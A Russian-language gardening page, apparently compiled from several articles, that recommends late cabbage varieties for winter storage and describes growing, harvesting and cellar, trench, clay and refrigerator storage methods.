1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Какой сорт капусты лучше хранится зимой

Подборка лучших сортов капусты для хранения на зиму и рекомендации по её выращиванию

Чтобы капуста хранилась всю зиму и при этом не утрачивала вкусовых качеств и полезных свойств, важно изучить требования к сортам для хранения и выбрать наиболее подходящую культуру для своего региона. Не меньшее значение имеют качество посевного материала, правила выращивания и сбора урожая.

Требования к сорту капусты для хранения

Далеко не любая культура подойдет для длительного хранения. Раннеспелые сорта не закладывают на зиму, среднеспелые оставляют всего на 2-3 месяца.

Чтобы обеспечить полноценный запас овощей, используют среднепоздние или поздние растения. Их преимущества:

  • отменный вкус;
  • высокая питательная ценность;
  • универсальность в применении: овощи употребляют в свежем виде, хранят и перерабатывают;
  • минимальное количество нитратов;
  • длительный срок хранения.

Поздние сорта капусты отличаются от ранних по внешним признакам: у них плотные кочаны с зеленым или белым окрасом, листья достаточно тугие и плотно прижаты друг к другу.

Лучшие сорта капусты для хранения на зиму

Предлагаем вашему вниманию хорошо зарекомендовавшие себя сорта и гибриды, которые огородники чаще других отбирают для длительного хранения.

Колобок F1

Один из самых популярных гибридов во всех регионах России, выдерживает хранение до 7 месяцев. Особенность таких овощей — бело-желтый срез с характерным отливом.

Средний вес плотного кочана — 4,2 кг, листва зеленая. Длительность созревания гибрида — до 150 дней. Показатели урожайности высокие, до 12 кг на 1 м 2 .

Важно! Колобок нередко подвергается гниению при хранении, поэтому овощи периодически проверяют на наличие повреждений.

Белоснежка

Сорт, получивший свое название из-за белого окраса как внутренней, так и наружной листвы. Средний вес овоща — около 2,5–4 кг. Кочаны не портятся до 6-7 месяцев и больше, используются для приготовления детской пищи. Культура устойчива к большинству болезней. Урожайность — 7–9 кг на м 2 .

Зимовка 1474

Один из самых морозоустойчивых сортов с сине-зеленым окрасом, выведен специально для выращивания в северных регионах. Вкус капусты значительно улучшается через 3-4 месяца хранения. Кочаны не портятся до 8 месяцев.

Сорт отличается длительным вегетационным периодом: до 175 дней с момента всходов. Он устойчив к грибковым болезням, гнилям и растрескиванию.

Сахарная голова

Позднеспелый сорт с приподнятой и раскидистой листовой розеткой. Листья крупные с серовато-зеленым окрасом и восковым налетом, вегетационный период — до 150 дней с момента появления всходов. Собирать урожай рекомендуется после наступления заморозков — так содержание сахара к листьях будет больше. Через месяц хранения овощи приобретают сладковатый вкус.

Сорт устойчив ко множеству заболеваний, в том числе фузариозу, бактериозу, киле. В благоприятных условиях Сахарная голова будет храниться до конца весны.

Купчиха

Купчиха популярна у фермеров благодаря отличным товарным и вкусовым качествам. Среднепоздний сорт с вегетационным периодом до 150 дней, кочаны плотные без пустот. Средний вес вилка — 2,5 кг, цвет зеленый снаружи и белый внутри. Культура устойчива к заболеваниям. Урожай хранится до 4 месяцев.

Амагер 611

Кочаны достигают спелости за 145–148 дней и вырастают среднего размера. Листья гладкие, края крупноволнистые, плотно прижаты друг к другу.

Сорт устойчив к низким температурам, средняя урожайность с 1 м 2 — 5–7 кг. В условиях низкой влажности капуста не портится до апреля.

Важно! При хранении Амагер подвергается точечному некрозу и серой гнили. Чтобы предотвратить заболевания, овощи закладывают абсолютно сухими, держат при постоянной температуре 0…+2°С.

Как выбрать сорт

Чтобы не разочароваться в посаженной культуре, внимательно подходят к выбору семян. Основные критерии:

Регион выращивания. Для определенных областей есть подходящие сорта капусты, информация об оптимальном месте культивации находится на упаковке с семенами. Чем дольше срок вегетации, тем теплее должен быть регион для посадки овоща.

  • Сроки созревания. В зависимости от целей использования капусты выбирают сорта по срокам созревания. Ранние содержат мало сахаров, листья у них нежные мягкие, подходят для употребления в свежем виде. Среднеспелые содержат больше полезных веществ, поздние лучше всего подходят для длительного хранения и засолки. Лучше посадить сразу несколько сортов с разными типами созревания, чтобы наслаждаться капустой как можно дольше.
  • Местная селекция. Чтобы быть уверенным в богатом урожае, выбирайте сорта, выведенные в регионе выращивания..
  • Перед приобретением семян стоит запросить у продавца сертификат качества: это убережет от покупки подделки.

    Особенности выращивания и сбора урожая

    При заготовке капусты для длительного хранения важно придерживаться правил ее культивации и сбора созревших овощей:

  1. Лучше всего высаживать капусту на участке, где до этого росли горох, огурцы, помидоры морковь. После кукурузы хорошего урожая не дождаться.
  2. Оптимальна легкая или суглинистая почва. Выращенные на супесчаном грунте кочаны хранятся не так долго.
  3. Удобрения способны как продлить, так и уменьшить срок лежкости капусты. Фосфорно-калийные подкормки увеличат длительность хранения. Капуста, выращенная на богатом азотом грунте, быстро испортится: в ее листве понижено количество сухих веществ, из-за чего листья подвержены гниению.
  4. Убирают урожай, когда дневная температура находится на уровне +2…+8°С, а ночью случаются заморозки до -3°С. Собранные ранее кочаны быстро начинают вянуть.
  5. Собирают овощи в сухую погоду, чтобы не пришлось их дополнительно просушивать. Вилки срезают острым ножом, оставляя 2-3 см кочерыжки. Для хранения в подвешенном состоянии кочерыжки оставляют.
  6. Верхние листы не удаляют, оставляя как минимум 2-3 кроющих листа, которые защитят капусту от болезней и механических повреждений.
  7. Перед зимовкой кочаны сортируют: оставляют только целые экземпляры, без признаков вялости, гнили, болезней или наличия вредителей. Лучше всего подходят овощи средней величины, тугие и округлые, немного приплюснутые. Рыхлые кочаны для хранения непригодны.

Нюансы для разных регионов

Климатические условия в разных широтах сильно отличаются друг от друга, поэтому для каждого региона есть свои особенности агротехники.

В Подмосковье

Преобладание пасмурных дней и неустойчивая погода весной создают сложности на ранних этапах выращивания культуры. Чтобы добиться хорошего урожая, учитывают некоторые особенности:

  • капусту высаживают в открытый грунт семенами, сеянцы укрывают вплоть до наступления устойчивой теплой погоды;
  • выбирают среднеспелые или среднепоздние сорта, так как поздние не успеют вызреть;
  • при отсутствии осадков летом посадки регулярно поливают.

В Сибири

Суровые климатические условия исключают выращивание капусты в открытом грунте из семян, поэтому применяют рассадный способ.

Внимание! Из-за короткого лета лучше отказаться от посадки поздних сортов с длительным вегетационным периодом. Предпочтительны среднеспелые и среднепоздние растения.

Специально адаптированные к суровому климату сорта: Сибирячка 60, Вьюга, Надежда, Точка.

Рассаду высаживают в открытый грунт во второй половине мая, в первое время грядки укрывают. В августе собирают среднеспелую капусту для употребления в свежем виде или квашения. Сбор среднепоздних овощей проводят в сентябре.

На Урале

Для неустойчивого уральского климата характерны резкие перепады температуры и интенсивное движение воздушных масс:

  • рассаду выращивают на теплых грядках, в теплицах или домашних условиях;
  • в мае высаживают растения в открытый грунт, участок накрывают плотным спанбондом: он защитит культуру от вредителей и низких температур;
  • для защиты от похолодания грядки мульчируют черной пленкой.

В регионе хорошо растут сорта Надежда и Вьюга, гибриды Атрия, Агрессор, Мегатон.

В средней полосе

Для средней полосы характерен умеренно-континентальный климат с влажным летом и в меру морозной зимой. Здесь капусту выращивают рассадным способом. Оптимальна посадка позднеспелых гибридов, срок вызревания которых составляет от 160 до 170 дней.

Заключение

Чтобы сохранить капусту на зиму без потери ее вкуса и пользы, высаживают среднепоздние или поздние сорта. Учитывают климатические особенности: чем длиннее период вегетации культуры, тем теплее должно быть в регионе ее выращивания. Собирают кочаны при +2…+8°С, экземпляры с повреждениями для хранения не подходят.

Сорта капусты для хранения на зиму

При выборе сорта капусты для хранения на зиму овощеводу стоит быть предельно внимательным. Необходимо учитывать количество урожая и срок его хранения.

Сорта капусты для хранения на зиму

Общая характеристика зимних видов

Для хранения на зиму лучше выбрать позднеспелый сорт, чтобы капусту можно было употреблять в свежем виде как можно дольше. Поздняя капуста имеет крепкие кочаны, прекрасно подходящие для заготовок. Существуют сорта, выведенные для длительного хранения. Эти виды способны дать больший урожай по сравнению с ранними.

По внешним данным отличить ранний вид от позднего несложно. Кочан зимней культуры плотный, имеет зеленый или белый окрас. Листья тугие, хорошо прижаты друг к другу. Вкус приятный, пригодна к употреблению вся головка.

У зимнего овоща сразу после сбора листья жесткие и невкусные. Чтобы вкус стал лучше, капусте необходимо некоторое время полежать в прохладном месте.

Сорта капусты для длительного хранения держат в погребе при соблюдении некоторых условий, иначе овощ долго не лежит.

Какие правила необходимо учитывать:

  • вилки капусты должна лежать, не прикасаясь друг к другу, размещаясь кочерыжками вверх;
  • температура в погребе, где будет храниться овощ, должна быть 0-2°C, влажность — 98 %. Погреб каждый день проветривают;
  • пол не должен быть земляным, поскольку плоды начнут портится: важно, чтобы овощ получал необходимое количество кислорода при хранении. Для этого применяют специальное устройство, которое помещают на пол: решетки деревянные, стеллажи, картон и т.д. Чтобы они не окислялись, их перед применением обрабатывают пищевой содой.

Лучшие сорта для хранения на зиму

Лучшие сорта зимней капусты включают урожайный виды, которые не просто способны пролежать длительное время, но и сохранить вкусовые качества. Такие разновидности популярны для выращивания. Их используют в целях продажи.

Слава

Славу выращивают чаще в южных областях. Ее делят на 2 вида.

  • Слава 1305.
  • Слава Грибовская 231.

Урожайность составляет 10-12,5 кг/м2. Кочан круглый светло-зеленого цвета, в середине белый. Масса овоща составляет 2,5-4 кг.

Сорт приспособлен к длительной транспортировке, применяется для закваски и засолки. Его сохранность — до 3-4 месяцев.

Харьковская зимняя

Данный сорт можно хранить до полугода

Этот вид дает большой урожай — 4,1-10,8 кг/кв. м. Культура хорошо переносит морозы и жару. Хранить овощ можно до 6 месяцев, после чего он теряет вкусовые и внешние качества. Кочан тугой, белый в середине. Часто болеет килой, но стоек к точечному некрозу.

Белоснежка

Овощ обладает прекрасными товарными свойствами. Название «Белоснежка» получил, благодаря белому окрасу внутренней и наружной листвы. Число урожая составляет 7-9 кг/кв. м. Вес плода — 2,5-4 кг. Длительность хранения — 6-7 месяцев, по истечении срока головки не трескаются. Сорт переносит большинство заболеваний.

Вид напоминает по составу пекинский овощ, поэтому его часто применяют для приготовления питания для детей. Он не имеет жилок, обладает хорошей структурой и легко обрабатывается.

Амагер 611

Урожайность культуры средняя — 5-6,5 кг/кв. м. Сорт подходит для выращивания во всех регионах, кроме Сибири. Хранится долгое время, в пределах 5-6 месяцев. Горечь начинает появляется только к весне. Листва сочная и нежная. Вес кочана — 2,4-4 кг. Культура негативно относится к жаре, поэтому хранится только в прохладном и темном месте. Сорт устойчив к заболеваниям.

Женева F1

Это лучший зимний вид с урожайностью 8-9 кг/кв. м. Капуста сорта Женева предназначена для хранения в пределах 8-9 месяцев. Овощ имеет сине-зеленый окрас. Вес плода — 3-5 кг. Внутри находятся жилки, поэтому ее редко применяют для употребления в свежем виде. Ее добавляют в различные блюда или квасят. Культура нормально развивается во всех регионах страны, нетребовательна к уходу.

Арос F1

Арос f1 хранится 7-8 месяцев, переносит все возможные заболевания и не склонен к растрескиванию кочана. Его вес — в пределах 1,9 г.

Тюркис

Сорт выведен немецкими селекционерами. Урожайность достигает до 8-10 кг/кв. м. Плоды хранятся долгое время — 7-8 месяцев, имеют темно-зеленый цвет. Головки круглые, их вес — 2-3 кг. Растение не боится таких болезней, как кила, фомоз, фузариоз, нормально растет в мороз и засуху.

Зимовка 1474

Этот вид овоща прекрасно себя чувствует зимой, ведь он один из самых морозоустойчивых. Длительность сохранности составляет 6-8 месяцев. Плод созревает в течение 175 дней, поэтому овощ нежелательно выращивать его в северных регионах. Вес составляет 3,5-4 кг. Кочан овальной формы. После созревания листва приобретает сине-зеленый цвет с сильным восковым налетом.

Лучшие сорта капусты для хранения зимой

Капуста неприхотлива в уходе, не требует много тепла и удобрения, но дает хороший урожай. И тут возникает вопрос: как сохранить большой урожай на протяжении всего зимнего сезона и какие сорта лучше для этого подходят?

Разнообразие сортов для хранения

Лучше всего хранятся именно гибридные сорта капусты. Среди них такие сорта:

Сорт капусты «Зимовка»

Отличить их можно по плотным кочанам, их вес достигает 4 килограмма. Сначала они горькие и употреблять их в пищу не рекомендуется. Только после длительного хранения несколько месяцев они приобретают все свои вкусовые качества. В зависимости от сорта изменяется срок хранения, некоторые должны полежать минимум 2 месяца, некоторые 4.

Лучше всего из всех сортов лежит именно зимовка. При этом она обладает длительным вегетационным периодом. Он длится около 140 дней после высадки рассады. Его листья имеют сине-зеленый оттенок и восковой налет. Храниться может 7 месяцев, после чего появляется устойчивость к точечному некрозу и растрескиванию.

Отличительным признаком для длительного хранения является долгий период вегетации. Поэтому обратить внимание нужно на среднепоздние и поздние сорта. Плотность кочана у них высокая, они будут долго храниться, овощ будет пригоден для квашения. Если кочан начинает формироваться в жару, то лучше отказаться от этого сорта, поскольку развитие овоща останавливается. В таком случае используются жаростойкие гибридные сорта, например:

Они хорошо переносят неблагоприятные условия, перепады температуры, жаркую погоду и засуху. При этом плоды имеют высокие вкусовые качества, долго хранятся и подходят для разных целей. Опытные садоводы рекомендуют использовать «Орбиту» и «Валентину», поскольку они хорошо хранятся и могут достигать 7 килограммов веса.

Следующий сорт, с которым стоит познакомиться – это «Слава». Он относится к среднепоздним сортам, не растрескивается, дает хороший урожай. Плоды будут готовы к сбору уже через 3-4 месяца после посадки. Длительность хранения не более 3 месяцев, максимальный вес одного кочана – 5 килограмм.

«Крюмон F1» созревает за 4 месяца, плоды не растрескиваются, набирают вес 2 килограмма. Они могут храниться больше полугода, можно употреблять в пищу в свежем виде или использовать для закваски.

Сорт «Тюркиз» созревает за 4 месяца, обладает плотной структурой. Кочаны хранятся довольно долго, их можно применять в пищу в свежем виде либо использовать для закваски.

При хранении капусты необходимо поддерживать определенный уровень температуры в помещении

Сорт «Амагер» созревает через 4 месяца, кочаны плотные, средний вес – 4 килограмма. Обладают высокой устойчивостью к растрескиванию, после хранения вкусовые качества значительно повышаются.

Большим спросом пользуется капуста «Московская поздняя». Ее кочаны крупные, плотные, максимальный вес при благоприятных условиях – 8 килограмм.

Сортов для хранения достаточно много, выбирать нужно в зависимости от индивидуальных требований и особенностей климата.

Хранение капусты зимой

Есть несколько методов хранения капусты зимой. Каждый сможет выбрать подходящий для себя. Основные условия для успешного хранения:

  • плоды не должны прикасаться друг к другу;
  • кочерыжки должны смотреть вверх;
  • температура воздуха должна быть от 0 до 2 градусов тепла;
  • не допускать замерзания капусты;
  • влажность воздуха 98%.

Очень важно поддерживать определенный уровень температуры во всем помещении. Устанавливаются термометры, а температура регулируется за счет люков и вытяжек.

Сначала нужно тщательно отобрать плоды, это должна быть капуста с зеленым листами. Складывать рядом капусту нельзя, поскольку она может выделять излишнюю влагу и загнивать.

Капуста не должна контактировать с земляным полом, поскольку со всех сторон должен быть доступ к кислороду. Для хранения капусты можно сделать любые сооружения своими руками, используются обычные доски, деревянная решетка или настил. Доски нужно очистить от пыли, обработать раствором соды. Чтобы капуста лучше сохранилась, под нее кладутся листья папоротника.

Чтобы под капустой не скапливалась влага, под решетку можно положить солому. Плоды выкладываются в шахматном порядке в несколько рядов.

Есть и другой метод хранения капусты. Кочаны, предварительно связанные шпагатом, подвешиваются к канату. Чтобы капуста лучше держалась, должна быть большая кочерыжка, хотя бы 4 см.

Для опытных садоводов может пригодиться метод консервации капусты в глине. Верхний слой листьев снимается, после чего кочерыжки привязываются к шпагату. Головки капусты должны быть покрыты большим слоем глины. Хранятся плоды в подвешенном к балке состоянии. Перед тем как вывешивать капусту в подвале, глина должна хорошо просохнуть.

Много кочанов или нет помещения? Можно хранить на улице

Если кочанов достаточно много, больше сотни, и для хранения нет помещения такой площади, то хранить плоды можно на улице. На заранее утрамбованную площадку выкладываются кочаны вверх кочерыжками. Зимой капуста накрывается снегом, его должно быть много, а температура окружающей среды низкая, в противном случае этот метод не подойдет.

Кочаны можно укладывать друг на друга, высота снежного покрова достигает 20 см, а ширина 1 метр. По бокам все это накрывается матами, сверху укладываются камыши или опилки толщиной 40 см.

Если зима теплая, а снега мало, то хранить капусту можно в земле. В вырытую канаву укладываются плоды также кочерыжками вверх, сверху укладывается земля слоем в 10 см. Чем холодней, тем больше должен быть слой почвы, но не боле 30 см.

Как правильно хранить свежую капусту, вы сможете узнать из следующего видео:

Капуста относится к овощам, что хорошо выдерживают температуру около 0°С. Ее можно хранить как в погребе, так и в домашних условиях, организовав месте в кладовой, подвале или на балконе. Но для хранения подходят только сорта, что собраны в поздние сроки: октябрь, ноябрь.

Это связано с тем, что позднеспелые сорта капусты имеют защиту от вредителей. Они выведены генетически и могут сохранять вкус, пользу и цвет до следующего урожая. Лучше всего на зиму сохраняются такие виды:

  • белокочанная;
  • краснокочанная;
  • цветная;
  • кольраби;
  • брюссельская.

Их структура позволяет при правильно подготовленном месте для хранения оставить урожай до весны.

Раз в неделю проверяйте капусту на наличие испорченных плодов.

Сорта капусты, подходящие для длительного хранения

Для кольраби и брюссельской капусты нет особенных требований к сортам: все они отлично переносят зиму при температуре около 0°С. Но для белокочанной требования другие, так как на первый взгляд трудно отличить позднеспелый сорт с высокой лежкостью от того, что надо употребить в течение месяца после сбора.

Лучшие сорта для хранения на зиму:

  • Слава;
  • Харьковская зимняя;
  • Белоснежка;
  • Женева F1;
  • Тюркис;
  • Зимовка 1474.

Их отличает одна общая особенность: сразу после сбора листья невкусные. Плодам надо дать отлежаться минимум 2 недели в сухом темном прохладном месте перед употреблением в пищу.

Хранение капусты на зиму: основные правила

С осени до следующего урожая свежими остаются только поздние сорта, так как они имеют более высокую плотность, чем раннего созревания, практически не гниют. При уборке капусты выбирайте плотные кочаны без пятен, но только тех сортов, что имеют высокую лежкость или способность оставаться свежими в течение полугода и более.

Подготовка овоща

Собирать с грядки урожай надо только в сухой, теплый день. Вручную срежьте все плоды, очистите стебель от земли, но не мойте, затем отсортируйте. Поврежденные листы удалите, но не срывайте все верхние полностью, оставьте для защиты середины от повреждений.

Особенности отдельных сортов

Для каждого сорта надо подготовить отдельную тару. Например, брюссельская капуста отлично хранится в песке или опилках. Цветную и другие с упругими кочанами лучше подвешивать, чтобы был постоянный приток свежего воздуха. А кольраби достаточно завернуть в пленку или бумагу и разложить на полках. С хрупкими видами — романеску и брокколи, надо обращаться осторожно, их лучше хранить отдельно в ящиках или коробках.

Места для хранения

Для хранения урожая нужно выделить место, в котором будет сухо, прохладно и темно. Такие условия оптимально соблюдены в таких местах:

Лучше всего подходят именно погреб и подпол, они рассчитаны на длительное хранение овощей.

Как подготовить помещение

Перед тем как сделать удобные полки или балку для подвешивания, надо обработать помещение известняковой побелкой, чтобы убрать грибок и плесень. Также надо наладить систему постоянного проветривания и сделать поддоны на высоте 10 см от пола, чтобы установить на них ящики и коробки с овощами.

Условия хранения

Рекомендованная температура – от 0°С до 5°С, при относительной влажности 70%. Как правило, в оборудованном сухом погребе или подвале с постоянной вентиляцией эти условия соблюдаются. В квартире сохранить капусту на зиму можно на застекленной лоджии или балконе рядом с другими продуктами.

Можно ли хранить капусту в песке

Если соблюдать все условия, рекомендованные в статье, хранить таким способом капусту можно. Однако для этого надо заказать чистый речной песок с карьера, без примесей. Уличный, что хранился во дворе, для такой цели не подходит. Также избегайте доступа домашним животным к месту хранения капусты в песке.

Песок нельзя заменять наполнителем для кошачьего туалета.

Как хранить капусту зимой в домашних условиях

Способов правильно хранить собранную капусту разных сортов свежей много. Все зависит от того, как долго в домашних условиях в квартире до сбора следующего урожая из теплицы или открытого грунта вы хотите использовать плоды без термической обработки. Главное условие – соблюдение правил хранения овощей.

В погребе

Самый удобный способ – хранить капусту в погребе на зиму до весны, тем более что погреб часто есть и в городе. Для этого подходят некоторые из описанных ниже вариантов, выбирайте по размерам помещения. Лучше всего сделать ограждение или полки, а также подвесить кочаны к потолку.

Обязательно условие: наличие вентиляции во избежание появления в помещении сырости и плесени. Для этого в сухую погоду оставляйте погреб иногда открытым на несколько часов днем, чтобы овощи проветривались.

В пирамиде

Постройте деревянную платформу на высоте около 10 см от пола, оставляя небольшие промежутки между половицами. Нижний ряд, прямоугольник, выложите самыми большими и плотными вилками. Во втором слое, поочередно разложите капусту меньшего размера. Продолжайте укладывать пирамиду по уменьшению кочанов.

В холодильнике

Большие кочаны займут много места, другие сорта капусты удобнее хранить в холодильнике. Немытые плоды с кочерыжками завернуть в пищевые бумажные пакеты. Как минимум до Нового года они останутся свежими, остаток можно заморозить.

В кессоне

Трудоемкий и надежный способ, для которого потребуется сделать на огороде яму и установить туда специальный резервуар с вентиляционной трубой. Это металлический погреб, его можно купить или сделать самому по чертежам. Есть разные размеры устройства, капуста и другие овощи останутся свежими до весны при соблюдении рекомендаций по хранению.

В кладовой

Сухая и прохладная кладовая подходит для хранения всех сортов. Для этого ее надо завернуть в бумагу или пленку, сложить в деревянные или картонные ящики. Если температура не поднимается выше 15°С, урожай будет свежим до Нового года. Оборудовать кладовку можно в подъезде с согласия соседей.

В подполе

Если в частном доме или под балконом на первом этаже есть подпол, это удобное место, чтобы хранить капусту в домашних условиях. Следите за тем, чтобы температура не поднималась выше 5°С после включения отопления. Важно вовремя проветривать помещение, если нет отдельной вентиляции во избежание появления сырости и плесени.

В бумаге

Этот метод изолирует плоды, включая прикосновение и заражение возможными бактериями. Бумага создает изоляцию, защищает от влаги и света. Обернутые головки разложите по полкам, ящикам или коробкам. Следите за сухостью, влажная бумага ускорит гниение капусты.

В гараже

Сухой гараж без отопления подходит для того, чтобы держать там собранные овощи с грядки. Оборудуйте для них отдельное место. Складируйте в ящики или сделайте ограждение с песком/опилками. Если начнутся сильные морозы, лучше перенести капусту в другое более теплое место.

В коробках

После обрезки стеблей и удаления лишних листьев разложите кочаны капусты в картонные коробки. Разместите их на поддонах, это замедлит повреждение. Нет необходимости делать крышку, но периодически проверяйте наличие испорченных листов и удаляйте их.

На крючках или веревках

Установите под потолком надежно закрепленную рейку, что выдержит вес овощей. Кочаны с необрезанными кочерыжками подвесьте на крючках, закрепленных на стебле. Постоянный приток воздуха не даст плодам подгнивать, главное, чтобы между ними было расстояние.

В глине

Сделайте глиняный раствор, обмажьте им каждую головку слоем в 0,5 см без просветов и высушите. Затем сложите в ящики или разместить на полках. Неудобство заключается в том, что для использования овоща надо будет замочить его в воде и затем тщательно вымыть размякшую глину.

В траншее

Выкопайте на огороде или во дворе яму глубиной 60 на возвышенности, внизу и на стенках уложите солому. Затем чередуйте капусту и утеплитель, сверху этой насыпи установите деревянный щит и насыпьте слой почвы толщиной 20 см.

В пищевой пленке

Сохранить капусту в подвале или в другом сухом месте с подходящей температурой воздуха можно с помощью обычной пищевой пленки в рулонах. Обернув каждый кочан, сложите их в тару. Плотно прилегающий материал сохранит овощи до весны, он имеет отличную влагостойкость. Упакованные вилки разложите по полкам или складируйте в ящики.

В деревянных ящиках

Кочаны, хранящиеся в ящиках, практически не портятся, так как есть постоянный приток свежего воздуха. Их дополнительно заверните в пленку или бумагу. Тару установите на поддоны 10 см от пола, по надобности утеплите, если будут сильные морозы.

Для хранения капусты берите ящики только из необработанной древесины.

Как хранить дома

Аналогично описанным выше способам хранения капусты в погребе и других местах сохраняют не только белокочанную, но и все виды цветной капусты, а также кольраби. Только брокколи не подходит для этих методов, так как быстро теряет цвет, ее нужно замораживать. Обязательно перед посадкой уточняйте принадлежность сорта к поздним, пригодным для зимнего хранения.

Пошаговые инструкции

Если нет погреба или подвала, в квартире можно оборудовать место для хранения капусты. Для этой цели подойдет лоджия или комната с хорошей вентиляцией и возможностью придерживаться температуры не выше 15°С.

Для этого потребуется:

  • сделать поддон из ящиков на высоте 10 см от пола;
  • установить коробки с капустой;
  • регулярно проветривать помещение.

Перед хранением при сборе урожая любым из способов всегда оставляйте 1,5-2 см кочерыжки.

С каким овощами рядом хранить нельзя

Капуста отлично хранится рядом с другими овощами: картофелем, свеклой, морковью, сельдереем. Однако категорически запрещено хранить ее рядом с яблоками. Они выделяют растительный газ этилен, что способствует быстрому дозреванию других плодов. Больше никаких ограничений нет для хранения капусты нет.

Собранный на зиму урожай можно хранить множеством разных способов. Выбирайте удобный для квартиры или частного дома, устраивайте помещение по рекомендованным нормам. После благоустройства подготовленная капуста разных сортов может оставаться свежей до весны, сохраняя вкусовые и питательные качества.

Лучшие зимние сорта капусты

Зимняя капуста растет до поздней осени. Сразу после сбора ее не едят, а складывают в погреб или любое иное подобное место, чтобы она отлежалась, набралась сладости, а вся горечь из нее вышла. Используют поздние виды капусты для длительного хранения на протяжении всей зимы и частично весны, а также для засолки и консервирования. Но какие зимние сорта капусты самые лучшие? В статье будут описаны сорта на любой вкус, с большими и малыми головками, краснокочанные и урожайные.

Лучшие сорта и гибриды капусты с крупными кочанами

Зимние сорта капусты могут иметь большую или маленькую головку – в зависимости от сорта. И для многих огородников это важный критерий, поэтому при выборе стоит обращать внимание на этот пункт в описании. Ниже представлены лучшие сорта с большими кочанами.

Лучшие сорта с большими кочанами.

  • «Московская» поздняя капуста созревает примерно за 130 дней. Масса кочанов 8-10 кг. Вкус хороший, головки тугие, трещат при резке. В разрезе цвет желто белый, а сами головки серо-зеленого цвета. Обладает иммунитетом к киле. Подходит для квашения, употребления в свежем виде, готовки салатов, первых, вторых блюд.
  • «Белоснежка» имеет голубо-зеленый окрас листьев, с сизым налетом. В разрезе белая. Кочаны 3,5-4,6 кг, бывает и больше при хорошем уходе. Вкус отменный, применение универсальное. Срок созревания до 150 дней. Урожайность может доходить до 7,5 кг/м. кв. Отличается устойчивостью к долгому хранению, транспортабельностью.
  • «Галакси F1» – голландский гибрид. Плоскоокруглые кочаны не трескаются, имеют массу в среднем 4,6 кг. Наружный окрас листьев темно-зеленый, а в разрезе – желто-белый. Созревание происходит на протяжении 160-175 суток. Урожай созревает дружно, при этом с квадратного метра собирается до 6,5 кг зимней капусты. При долгом хранении не сохнет и не гниет, рекомендуется к употреблению в свежем виде.

Поздняя капуста с небольшими кочанами

Зимние сорта капусты с большими кочанами – это гордость любого дачника. Однако их практичность сомнительна. Они не выгодны, так как быстро портятся. В свою очередь небольшие кочаны удобны.

Поздняя капуста с небольшими кочанами

  • «Амтрак F1» – голландский гибрид созревающий за 140-176 дней. Головка капусты округлая, тугая, гладкая. Вес каждой – 1,7-2,2 кг. Кочаны ровные, устойчивы к растрескиванию. Листья вкусные, после того, как капуста отлежится, кочан в разрезе белый. Внутренняя кочерыга маленькая. Урожайность 3,1-5,5 кг/м. кв. Имеется устойчивость к фузариозу, трипсам.
  • «Арос F1» – поздний гибрид зимней капусты, созревающий за 130-140 дней после появления всходов. Особенность гибрида – небольшие качены массой до 1,9 кг. Они плотные, светло-зеленые, и вкусные после того, как отлежатся. Имеется иммунитет к основным возбудителям заболеваний. Срок хранения 7-8 месяцев, в некоторых случаях и дольше.
  • «Илона F1» – гибрид, дающий урожай за 4 месяца. Имеется устойчивость к заболеванию, стрелкованию, растрескиванию. Кочан весит 1,6-2,3 кг, светло-зеленого цвета, плотный. В разрезе капуста белая, кочерыжка не очень большая. С гектара собирается до 570 центнеров капусты.
  • «Сахарная голова» – поздний зимний сорт капусты. Созревание происходит на протяжении 4 месяцев. Кочаны округлой формы, плотные, массой 2,4-4,5 кг. Этот сорт отличается повышенным содержанием сахара, поэтому его рекомендуют для приготовления свежих салатов. Срок хранения до 6 месяцев.

Сюда же относят: «Гарант F1», «Графиня F1», «Валентина F1».

Самая урожайная поздняя капуста

Урожайные сорта и гибриды капусты выращиваются обычно на продажу. Конечно, любому огороднику приятно вырастить большой урожай, но ведь его еще нужно как-нибудь переработать или где-нибудь хранить. Поэтому перед выбором этих сортов стоит заранее продумать, куда девать будущий урожай. Ниже представлены сорта и гибриды, которые дают большие и стабильные урожаи из года в год.

Сорта и гибриды, которые дают большие и стабильные урожаи

  • «Уля F1» – поздний гибрид родом из Польши. Созревание происходит за 118-125 суток. У растения тугая головка, плоскоокруглой формы, массой 3-4 кг. Как и многие зимние сорта капусты, этот гибрид имеет универсальное применение. Срок хранения в хороших условиях – 10 месяцев. Урожайность – 12 кг/м. кв.
  • «Крюмон F1» – поздний гибрид, созревание происходит за 120-170 дней (в зависимости от региона). Кочаны не растрескиваются, тугие, имею массу 2,1-4 кг. Окрас – серо-зеленый, а форма округло-плоская. Срок хранения может доходить до 7 месяцев. Обладает иммунитетом к фузариозу, сосудистому бактериозу. Примерная урожайность 7-11 кг/м. кв.
  • «Подарок» – поздний сорт капусты, созревающий за 4-4,5 месяца после появления всходов. Кочаны больших размеров – 3-5 кг. Они округлые, немного сплюснутые сверху, плотные, в разрезе зелено-белые. Урожайность с квадратного метра 9-10 кг/сезон. Рекомендуется для свежего потребления, квашения. Срок хранения в среднем 7 месяцев.
  • «Мара» созревает за 165-175 дней от появления первых всходов. Головки почти круглые, небольшие – 2,5-3,2 кг, тугие, не растрескиваются. С квадратного метра собирается по 8-9,5 кг урожая. Сорт отличается транспортабельностью, отличным вкусом и приятным внешним видом кочанов. Имеется устойчивость к накоплению нитратов. Использование универсально.
  • «Агрессор F1» созревает примерно за 4 месяца. Сорт дает увесистые головки до 5 кг, но чаще 3-4 кг, не растрескиваются. Имеется иммунитет к трипсу, фузариозу, переносит засуху, неприхотлив в уходе. С метра квадратного получается до 8 кг капусты. Вкус кочана отменный, листочки сочные, хрустящие, сладковатые. Срок хранения 5-6 месяцев.

К высокоурожайным разновидностям поздней капусты стоит также отнести: «Слава», «Тюркис», «Мегатон F1».

Лучшие поздние сорта краснокочанной капусты

Краснокочанная капуста чаще всего используется в салатах. Она имеет нежную текстуру и приятный вкус. Поздние же сорта выгодно выделяются своим сравнительно долгим сроком хранения.

Поздние сорта краснокочанной капусты

  • «Юнона» созревает за 160 дней в среднем. Кочаны небольшие, до 1,2 кг, правильной, округлой формы, плотные. Вкус очень хороший, используется по большей части в свежем виде. Хранится до 6 месяцев.
  • «Родима F1» созревает капуста примерно за 140 суток. Кочаны растут средними, весом до 3 кг. У него долгий срок хранения – при должных условиях до весны. Применение универсальное, но из-за приятного, насыщенного вкуса рекомендуется для салатов. Увеличение урожайности возможно при выращивании под пленочным укрытием.
